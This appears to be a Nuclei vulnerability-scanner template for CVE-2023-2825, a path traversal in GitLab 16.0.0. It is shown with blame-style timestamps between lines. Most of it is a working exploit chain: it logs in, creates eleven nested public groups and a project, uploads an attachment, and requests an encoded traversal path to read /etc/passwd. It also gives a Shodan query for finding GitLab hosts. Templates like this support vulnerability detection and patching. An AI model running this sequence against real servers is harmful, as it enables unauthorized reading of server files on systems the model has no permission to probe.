2023-05-29 08:36:11 +00:00
id : CVE-2023-2825
info :
2023-05-29 18:01:22 +00:00
name : GitLab 16.0.0 - Path Traversal
2023-05-29 08:36:11 +00:00
author : DhiyaneshDk,rootxharsh,iamnoooob,pdresearch
2023-07-11 19:49:27 +00:00
severity : high
2023-05-29 08:36:11 +00:00
description : |
An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups
2023-09-06 11:43:37 +00:00
remediation : |
Upgrade GitLab to a version that is not affected by the path traversal vulnerability (CVE-2023-2825).
2023-05-29 08:36:11 +00:00
reference :
- https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/
- https://github.com/Occamsec/CVE-2023-2825
- https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/
2023-05-29 18:01:22 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-2825
2023-07-11 19:49:27 +00:00
- https://gitlab.com/gitlab-org/cves/-/blob/master/2023/CVE-2023-2825.json
2023-05-29 18:01:22 +00:00
classification :
2023-07-11 19:49:27 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2023-05-29 18:01:22 +00:00
cve-id : CVE-2023-2825
2023-07-11 19:49:27 +00:00
cwe-id : CWE-22
2024-03-23 09:28:19 +00:00
epss-score : 0.09134
2024-04-08 11:34:33 +00:00
epss-percentile : 0.94495
2023-09-06 11:43:37 +00:00
cpe : cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:*
2023-05-29 08:36:11 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:43:37 +00:00
max-request : 16
2023-07-11 19:49:27 +00:00
vendor : gitlab
product : gitlab
2023-09-06 11:43:37 +00:00
shodan-query : title:"Gitlab"
2024-05-03 02:29:56 +00:00
tags : cve2023,cve,gitlab,lfi,authenticated,intrusive
2023-05-29 08:36:11 +00:00
variables :
2023-07-11 19:49:27 +00:00
data : "{{rand_base(5)}}"
2023-05-29 08:36:11 +00:00
http :
- raw :
- |
GET /users/sign_in HTTP/1.1
Host : {{Hostname}}
- |
POST /users/sign_in HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
Accept : */*
user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}
- |
POST /groups HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
Accept : */*
group%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
@timeout : 15s
POST /projects HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : application/x-www-form-urlencoded
project%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}
- |
POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1
Host : {{Hostname}}
Accept : */*
X-CSRF-Token : {{x-csrf-token}}
Content-Type : multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6
--0ce2a9fbe06b6da89c138a35a1765ed6
Content-Disposition : form-data; name="file"; filename="{{randstr}}"
{{randstr}}
--0ce2a9fbe06b6da89c138a35a1765ed6--
- |
GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host : {{Hostname}}
Accept : */*
2023-07-11 19:49:27 +00:00
host-redirects : true
matchers-condition : and
matchers :
- type : word
words :
- 726f6f743a78
encoding : hex
- type : word
part : header
words :
- application/octet-stream
- etc%2Fpasswd
condition : and
2023-05-29 08:36:11 +00:00
extractors :
- type : regex
name : token_1
group : 1
regex :
2023-07-11 19:49:27 +00:00
- name="authenticity_token" value="([A-Za-z0-9_-]+)"
2023-05-29 08:36:11 +00:00
internal : true
2023-07-11 19:49:27 +00:00
part : body
2023-05-29 08:36:11 +00:00
- type : regex
name : token_2
group : 1
regex :
2023-07-11 19:49:27 +00:00
- name="csrf\-token" content="([A-Z_0-9a-z-]+)"
2023-05-29 08:36:11 +00:00
internal : true
2023-07-11 19:49:27 +00:00
part : body
2023-05-29 08:36:11 +00:00
- type : regex
name : parent_id
group : 1
regex :
2023-07-11 19:49:27 +00:00
- href="\/groups\/new\?parent_id=([0-9]+)
2023-05-29 08:36:11 +00:00
internal : true
2023-07-11 19:49:27 +00:00
part : body
2023-05-29 08:36:11 +00:00
- type : regex
name : namespace_id
group : 1
regex :
2023-07-11 19:49:27 +00:00
- ref="\/projects\/new\?namespace_id=([0-9]+)
2023-05-29 08:36:11 +00:00
internal : true
2023-07-11 19:49:27 +00:00
part : body
2023-05-29 08:36:11 +00:00
- type : regex
name : x-csrf-token
group : 1
regex :
2023-07-11 19:49:27 +00:00
- const headers = \{"X\-CSRF\-Token":"([a-zA-Z-0-9_]+)"
2023-05-29 08:36:11 +00:00
internal : true
2023-07-11 19:49:27 +00:00
part : body
2023-05-29 08:36:11 +00:00
- type : regex
name : upload-hash
group : 1
regex :
- '"url":"\/uploads\/([0-9a-z]+)\/'
internal : true
2023-07-11 19:49:27 +00:00
part : body
2024-05-03 08:43:05 +00:00
# digest: 4a0a00473045022100ce74731d4f03315a39203e3aa3775a80c5a82171b15cb8251c13b84816f869a502200e2fc502e7a3ab3a6d1d51fb7acb0c6a69777c3fb805501cc36ffdd30e3d4f27:922c64590222798bb761d5b6d8e72950